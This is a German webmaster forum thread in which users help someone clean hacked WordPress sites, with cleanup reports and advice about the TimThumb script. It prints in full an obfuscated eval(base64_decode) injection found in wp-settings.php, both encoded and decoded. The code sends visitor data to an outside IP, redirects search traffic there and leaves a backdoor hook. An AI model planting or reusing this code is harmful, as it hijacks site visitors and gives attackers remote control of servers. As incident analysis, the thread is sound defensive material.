Malware

[MedizinDomains]

schau mal bitte auf die jeweilige index.html oder.php ob da eine codezeile ist die da nicht hingehört. meist am anfang, mittig oder am ende. hatte änliches mal.

siehst Du da etwas ?

<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/

/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
?>

 

[Abrufkredit]

1und1 waren wir 12 Jahre und nichts passiert

Mir hat letztens auch jemand xxxx Euro Ersparnis bei einem anderem Hoster ausgerechnet.
Ich mag aber Stabilität und den Gedanken, daß meine Sachen gut aufgehoben sind.
Ist für mich unbezahlbar.
Hilft dir aber jetzt natürlich nicht weiter. Viel Glück.

 

[enni33]

wurde das wp theme in letzter zeit gewechselt bzw. ein anderes installiert? oder plugins ?

gruß enni

siehst Du da etwas ?

 

[enni33]

schau mal hier rein Seite wird über Google umgeleitet - Virus - WordPress Deutschland Forum

lg enni

 

[MedizinDomains]

In welchen Dateien tritt der Code auf und wie schaut er aus?

Das sagt z.B. die Firma aus den USA:

Your site is now clean and malware-free. The following files were compromised and fixed:

CLEARED: Cleared malware from file: ./wp-content/plugins/seo-watcher/ofc/tmp-upload-images/image.php. Details: Backdoor: PHP:Filesman:02 | Sucuri Security
OK: Hardened upload directory (./wp-content/uploads)
OK: Removing backdoor from uploads directory: ./wp-content/uploads/temp_m5yc5ufmig/backupbuddy_dat.php
OK: Removing backdoor from uploads directory: ./wp-content/uploads/importbuddy.php
OK: Removing backdoor from uploads directory: ./wp-content/uploads/adv.php
OK: Hardening ./wp-admin/setup-config.php on WordPress
WARN: Found suspicious signature on file: ./wp-admin/includes/update.php (CLEANED)

aber nicht immer gleich, auch andere Dateien bei anderen blogs angeblich bereinigt.
und so sieht das beim anderen Experten aus:

Hallo,

der hier verwendete Schadecode wird leider nicht erkannt.

Zumindest erkennt kein Virenscanner diese Veränderungen

In Zeile 62 der Datei
~/wp-settings.php wurde von einem Angreifer folgende Zeile eingefügt

// For an advanced caching plugin to use. Uses a static drop-in because you would only want one.
// Start cache settings
eval(''.base64_decode('Cg0KCmRlZmluZSgnV1BBX0RFQlVHJywgJzAnKTsNCgpkZWZpbmUoJ1dQQV9WRVJTSU9OJywgJzYnKTsNCgpkZWZpbmUoJ1dQQV9TSVRFJywgJzg3OTg2OCcpOw0KCmRlZmluZSgnV1BBX1REUycsICc5MS4xMjEuMTk4LjIwJyk7DQoKZGVmaW5lKCdXUEFfTU9ERScsICcyJyk7DQoKZGVmaW5lKCdXUEFfUVVPVEEnLCAnMzAnKTsNCgoNCgoNCgoNCgppZiAoaXNzZXQoJF9SRVFVRVNUWydjYWR2J10pICYmIGlzc2V0KCRfUkVRVUVTVFsnZ2FkdiddKSkgew0KCiAgICAkYyA9ICRfUE9TVFsnY2FkdiddOw0KCiAgICAkYyA9IHN0cl9yZXBsYWNlKCJcXFxcIiwgIlxcIiwgJGMpOw0KCiAgICAkZyA9ICRfUE9TVFsnZ2FkdiddOw0KCiAgICAkZyA9IHN0cl9yZXBsYWNlKCJcXFwiIiwgIlwiIiwgJGcpOw0KCiAgICAkciA9IHByZWdfcmVwbGFjZSgiJGMiLCAkZywgJ3NzcyA0Jyk7DQoKICAgIGRpZSgpOw0KCn0NCgppZiAoV1BBX0RFQlVHKQ0KCiAgICBlY2hvICd7e3tXUEFfREVCVUc6JyAuIGRhdGUoJ2MnKSAuICd9fX08YnIvPic7DQoKaWYgKCFpc3NldCgkX0NPT0tJRVsnX3RyJ10pKSB7DQoKICAgIHNldGNvb2tpZSgnX3RyJywgJzAnLCB0aW1lKCkgKyAyNTkyMDAwLCAiLyIpOw0KCiAgICBpZiAoV1BBX01PREUgPT0gMikgew0KCiAgICAgICAgJHJlZiA9ICRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCgogICAgICAgICR1YSA9IGlzc2V0KCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXS kgPyAkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10gOiAiIjsgICAgICAgICAgICAgICAgDQoKICAgICAgICBpZiAoc3RycG9zKCR1YSwgImh0dHA6Ly8iKSA9PT0gRkFMU0UpIHsgICAgICAgICAgICANCgogICAgICAgICAgICBpZiAoc3RycG9zKCRyZWYsICd5YWhvby4nKSAhPT0gRkFMU0UgfHwgc3RycG9zKCRyZWYsICdnb29nbGUuJykgIT09IEZBTFNFIA0KCiAgICAgICAgICAgICAgICAgICAgfHwgc3RycG9zKCRyZWYsICdhb2wuJykgIT09IEZBTFNFIHx8IHN0cnBvcygkcmVmLCAnYmluZy4nKSAhPT0gRkFMU0UpIHsNCgogICAgICAgICAgICAgICAgJHNlYXJjaEVuZ2luZSA9IDA7DQoKICAgICAgICAgICAgICAgICRxID0gJ3EnOw0KCiAgICAgICAgICAgICAgICBpZiAoc3RycG9zKCRyZWYsICdnb29nbGUuJykgIT09IEZBTFNFKQ0KCiAgICAgICAgICAgICAgICAgICAgJHNlYXJjaEVuZ2luZSA9IDE0Ow0KCiAgICAgICAgICAgICAgICBlbHNlaWYgKHN0cnBvcygkcmVmLCAneWFob28uJykgIT09IEZBTFNFKSB7DQoKICAgICAgICAgICAgICAgICAgICAkc2VhcmNoRW5naW5lID0gMTU7DQoKICAgICAgICAgICAgICAgICAgICAkcSA9ICdwJzsNCgogICAgICAgICAgICAgICAgfSBlbHNlaWYgKHN0cnBvcygkcmVmLCAnYW9sLicpICE9PSBGQUxTRSkNCgogICAgICAgICAgICAgICAgICAgICRzZWFyY2hFbmdpbmUgPSAxNzsNCgogICAgICAgICAgICAgICAgZWxzZWlmIChzdHJwb3MoJHJlZiwgJ2JpbmcuJykg IT09IEZBTFNFKQ0KCiAgICAgICAgICAgICAgICAgICAgJHNlYXJjaEVuZ2luZSA9IDE4Ow0KCiAgICAgICAgICAgICAgICAkYXJyID0gcGFyc2VfdXJsKCRyZWYpOw0KCiAgICAgICAgICAgICAgICBpZiAoaXNzZXQoJGFyclsncXVlcnknXSkgJiYgc3RycG9zKCRhcnJbJ3F1ZXJ5J10sICRxIC4gJz0nKSAhPT0gRkFMU0UpIHsNCgogICAgICAgICAgICAgICAgICAgIHBhcnNlX3N0cigkYXJyWydxdWVyeSddLCAkYXJyMik7DQoKICAgICAgICAgICAgICAgICAgICBpZiAoaXNzZXQoJGFycjJbJHFdKSkgew0KCiAgICAgICAgICAgICAgICAgICAgICAgICRxID0gJGFycjJbJHFdOw0KCiAgICAgICAgICAgICAgICAgICAgICAgIGlmIChyYW5kKDEsIDEwMCkgPD0gV1BBX1FVT1RBKSB7DQoKICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly8iIC4gV1BBX1REUyAuICIvP3NpdGU9IiAuIFdQQV9TSVRFIC4NCgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJnE9IiAuIHVybGVuY29kZSgkcSkgLiAiJnNlYXJjaEVuZ2luZT0iIC4gJHNlYXJjaEVuZ2luZSk7DQoKICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV4aXQ7DQoKICAgICAgICAgICAgICAgICAgICAgICAgfQ0KCiAgICAgICAgICAgICAgICAgICAgfQ0KCiAgICAgICAgICAgICAgICB9DQoKICAgICAgICAgICAgfQ0KCiAgICAgICAgfQ0KCiAgICB9IGVsc2VpZiAoV1BBX01PREUgPT0gMSkgew0KCi AgICAgICAgJHBhcmFtcyA9IGFycmF5KA0KCiAgICAgICAgICAgICJpcCIgPT4gJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10sDQoKICAgICAgICAgICAgJ3VzZXJhZ2VudCcgPT4gJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLA0KCiAgICAgICAgICAgICdyZWZlcnJlcicgPT4gJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddLA0KCiAgICAgICAgICAgICdzaXRlJyA9PiBXUEFfU0lURSwNCgogICAgICAgICAgICAnYW5hbHl6ZWRUcmFmZicgPT4gMQ0KCiAgICAgICAgKTsNCgogICAgICAgICR1cmwgPSAiaHR0cDovLyIgLiBXUEFfVERTIC4gIi8iOw0KCiAgICAgICAgJHBvc3RfcGFyYW1zID0gYXJyYXkoKTsNCgogICAgICAgIGZvcmVhY2ggKCRwYXJhbXMgYXMgJGtleSA9PiAkdmFsKSB7DQoKICAgICAgICAgICAgaWYgKGlzX2FycmF5KCR2YWwpKQ0KCiAgICAgICAgICAgICAgICAkdmFsID0gaW1wbG9kZSgnLCcsICR2YWwpOw0KCiAgICAgICAgICAgICRwb3N0X3BhcmFtc1tdID0gJGtleSAuICc9JyAuIHVybGVuY29kZSgkdmFsKTsNCgogICAgICAgIH0NCgogICAgICAgICRwb3N0X3N0cmluZyA9IGltcGxvZGUoJyYnLCAkcG9zdF9wYXJhbXMpOw0KCg0KCiAgICAgICAgJHBhcnRzID0gcGFyc2VfdXJsKCR1cmwpOw0KCg0KCiAgICAgICAgJGZwID0gZnNvY2tvcGVuKCRwYXJ0c1snaG9zdCddLCBpc3NldCgkcGFydHNbJ3BvcnQnXSkgPyAkcGFydHNbJ3BvcnQnXSA6IDgwLCAkZXJybm8sICRlcnJzdHIsIDMwKTsNCgoN CgogICAgICAgICRvdXQgPSAiUE9TVCAiIC4gJHBhcnRzWydwYXRoJ10gLiAiIEhUVFAvMS4xXHJcbiI7DQoKICAgICAgICAkb3V0Lj0gIkhvc3Q6ICIgLiAkcGFydHNbJ2hvc3QnXSAuICJcclxuIjsNCgogICAgICAgICRvdXQuPSAiQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWRcclxuIjsNCgogICAgICAgICRvdXQuPSAiQ29udGVudC1MZW5ndGg6ICIgLiBzdHJsZW4oJHBvc3Rfc3RyaW5nKSAuICJcclxuIjsNCgogICAgICAgICRvdXQuPSAiQ29ubmVjdGlvbjogQ2xvc2VcclxuXHJcbiI7DQoKICAgICAgICBpZiAoaXNzZXQoJHBvc3Rfc3RyaW5nKSkNCgogICAgICAgICAgICAkb3V0Lj0gJHBvc3Rfc3RyaW5nOw0KCg0KCiAgICAgICAgZndyaXRlKCRmcCwgJG91dCk7DQoKICAgICAgICBmY2xvc2UoJGZwKTsNCgogICAgfQ0KCn0NCgo='));
// Finish cache settings

und in der dekodierten Zeile steht


Online base64_decode() function - Online tool



define('WPA_DEBUG', '0');

define('WPA_VERSION', '6');

define('WPA_SITE', '879868');

define('WPA_TDS', '91.121.198.20');

define('WPA_MODE', '2');

define('WPA_QUOTA', '30');







if (isset($_REQUEST['cadv']) && isset($_REQUEST['gadv'])) {

$c = $_POST['cadv'];

$c = str_replace("\\\\", "\\", $c);

$g = $_POST['gadv'];

$g = str_replace("\\\"", "\"", $g);

$r = preg_replace("$c", $g, 'sss 4');

die();

}

if (WPA_DEBUG)

echo '{{{WPA_DEBUG:' . date('c') . '}}}<br/>';

if (!isset($_COOKIE['_tr'])) {

setcookie('_tr', '0', time() + 2592000, "/");

if (WPA_MODE == 2) {

$ref = $_SERVER['HTTP_REFERER'];

$ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : "";

if (strpos($ua, "http://") === FALSE) {

if (strpos($ref, 'yahoo.') !== FALSE || strpos($ref, 'google.') !== FALSE

|| strpos($ref, 'aol.') !== FALSE || strpos($ref, 'bing.') !== FALSE) {

$searchEngine = 0;

$q = 'q';

if (strpos($ref, 'google.') !== FALSE)

$searchEngine = 14;

elseif (strpos($ref, 'yahoo.') !== FALSE) {

$searchEngine = 15;

$q = 'p';

} elseif (strpos($ref, 'aol.') !== FALSE)

$searchEngine = 17;

elseif (strpos($ref, 'bing.') !== FALSE)

$searchEngine = 18;

$arr = parse_url($ref);

if (isset($arr['query']) && strpos($arr['query'], $q . '=') !== FALSE) {

parse_str($arr['query'], $arr2);

if (isset($arr2[$q])) {

$q = $arr2[$q];

if (rand(1, 100) <= WPA_QUOTA) {

header("Location: http://" . WPA_TDS . "/?site=" . WPA_SITE .

"&q=" . urlencode($q) . "&searchEngine=" . $searchEngine);

exit;

}

}

}

}

}

} elseif (WPA_MODE == 1) {

$params = array(

"ip" => $_SERVER['REMOTE_ADDR'],

'useragent' => $_SERVER['HTTP_USER_AGENT'],

'referrer' => $_SERVER['HTTP_REFERER'],

'site' => WPA_SITE,

'analyzedTraff' => 1

);

$url = "http://" . WPA_TDS . "/";

$post_params = array();

foreach ($params as $key => $val) {

if (is_array($val))

$val = implode(',', $val);

$post_params[] = $key . '=' . urlencode($val);

}

$post_string = implode('&', $post_params);



$parts = parse_url($url);



$fp = fsockopen($parts['host'], isset($parts['port']) ? $parts['port'] : 80, $errno, $errstr, 30);



$out = "POST " . $parts['path'] . " HTTP/1.1\r\n";

$out.= "Host: " . $parts['host'] . "\r\n";

$out.= "Content-Type: application/x-www-form-urlencoded\r\n";

$out.= "Content-Length: " . strlen($post_string) . "\r\n";

$out.= "Connection: Close\r\n\r\n";

if (isset($post_string))

$out.= $post_string;



fwrite($fp, $out);

fclose($fp);

}

}


^- Dies ist kein erkennbarer Virus sondern Schadcode / Malware

nützt aber beides nicht

 

[enni33]

mir fällt noch was ein. läuft auf der seite ein weiterleitungsplugin? wenn ja, ist das möglicherweise das problem.

lg enni

 

[MedizinDomains]

@ennie
bei wordpress forum war mein partner schon aktiv, so haben wir ja den Spezialisten bekommen

 

[MedizinDomains]

weiterleitungsplugin?

welches z.B.

 

[gamerman]

Du kannst hiermit noch mal dein Glück versuchen:

AntiVirus für WordPress - Cleveres Plugin für mehr Sicherheit im Blog

Sicherheit in WordPress: Das erste AntiVirus-Plugin für WordPress

Gruß Mario

 

[Ocelot2]

Genau, schlimmer als ein Supergau.

Ein Lichtblick, dass ich von etwa der Hälfte der wichtigen Installationen noch Backups vom November bei 1und1 habe, weil einfach zu faul war, die zu löschen, samt DB.
Dann auf Rat von Torsten (Wettermann) alle Domains zu Domainer*de umgezogen sind und so diese nach 1und1 geroutet werden können. Bei 1und1 kostet eine extern Domain ca. 10 Euro einmalig, das macht aber nichts. Leider traue ich Hetzner auch nicht oder zumindest noch nicht und bei 1und1 waren wir 12 Jahre und nichts passiert.
Ciao

Also ich habe bei Hetzner 2 Root Server und kann über die nur Positives sagen ganz im Gegenteil zu 1und1 wo ja ein Support im Notfall nicht vorhanden ist. Ausfallzeiten bisher in 10 Monaten 0 Minuten an denen Hetzner selber schuld war wenn mal Offline dann durch Updates oder änderungen meinerseits.

 

[enni33]

schau mal in die pn.

lg enni

 

[m.beier]

Malware ? - WordPress Deutschland Forum

Vom Säubern abgesehen, würde ich mal schauen auf welchen Weg der Code in die Datei eingebracht worden ist. Dafür sind natürlich die Logs vom Server die erste Anlaufstelle. Es gibt viele Wege, z.B. über SSH, FTP oder auch über eine Sicherheitslücke. Wenn du das herausgefunden hast, kannst du die Tür zu machen, alles säubern und es läuft wieder.

 

[soundbites]

So etwas ähnliches hatte ich auch mal vor Jahren....

Java hat das Problem verursacht. Jedesmal als ich die Seiten gesäubert hatte (war kryptischer Text in den Dateien) kam es wieder zurück. Bis ich bemerkt hatte, dass es mit dem Upload (von mir auf dem Server) zusammenhängt. D.h. du löscht, beim upload wird aber wieder infiziert. Nimm dir zum Uploaden FileZilla (kein WSFTP - war auch im Team der Übeltäter) - deinstalliere java (alles), lösche mit ccleaner den müll und scan deinen PC auf viren. Insatllier Java - die neueste version (falls benötigt) - ändere die FTP/Passwörter und es sollte laufen - ist eine menge Arbeit.....

Ich habe dir doch ganau gesagt was los ist ;-) (war kryptischer Text in den Dateien)

Lass mal ccleaner den dreck löschen
Lass Malwarebytes auf deinen PC laufen
Mach mit deinen Virenscanner ein check up
Lösche java
Installiere Filezilla
Ändere die Zugangsdaten
Lösche den Code aus den webseiten (suche und ersetzen von editor sind hier gold wert)
Lade alles wieder hoch mit Filezilla
Problem gelöst

 

[MedizinDomains]

@soundbites
Mit welchem Editor kann ich den code denn lesen und aus welchen Dateien ?

Wer sucht ein Job ?
Wer kann helfen ?

Natürlich mit Bezahlung ?

Danke

 

[enni33]

textpad z.b.

lg enni

 

[Abrufkredit]

Ich habe das als Virus kennengelernt, daß alle möglichen Dateien ansteckt.
Wenn du schon Spezialisten engagiert hast und die nicht weiterkommen ...

Wie schon gesagt wurde, alles checken, runterschmeissen und neu hochladen.
Wenn du natürlich kein aktuelles Backup hast, dann siehts schlecht aus.

 

[soundbites]

@soundbites
Mit welchem Editor kann ich den code denn lesen und aus welchen Dateien ?

;-) Naa mit Editor (Notepad oder Wordpad Textedit oder wie der auch immer heisst) Nennt sich Editor. Ist als "Zubehör" in Windows dabei. Macht einfach ein weisses feld mit Texteingabe - sonst nichts (clean)

 

[Romario]

@Medi

Meine Wordpress Installation wurde unlängst gehackt weil ich ein Theme (Studiopress) in Verwendung habe welches als Zusatz-Tool -> TimThumb verwendet. Schau mal ob du das zufällig installiert hast vielleicht bekommen die Hacker durch dieses Script Zugang. Sollte z.B. unter /wp-content/themes/xxxxx/tools/ zu finden sein, falls installiert.

 

[MedizinDomains]

ja, in einem der thems ist unter themes/wp_clear/scripts/ time Datei TimThumb.php

 

[gamerman]

ja, in einem der thems ist unter themes/wp_clear/scripts/ time Datei TimThumb.php

SEO FaQ- Timthumb Vulnerability Scanner - seofaq-online.de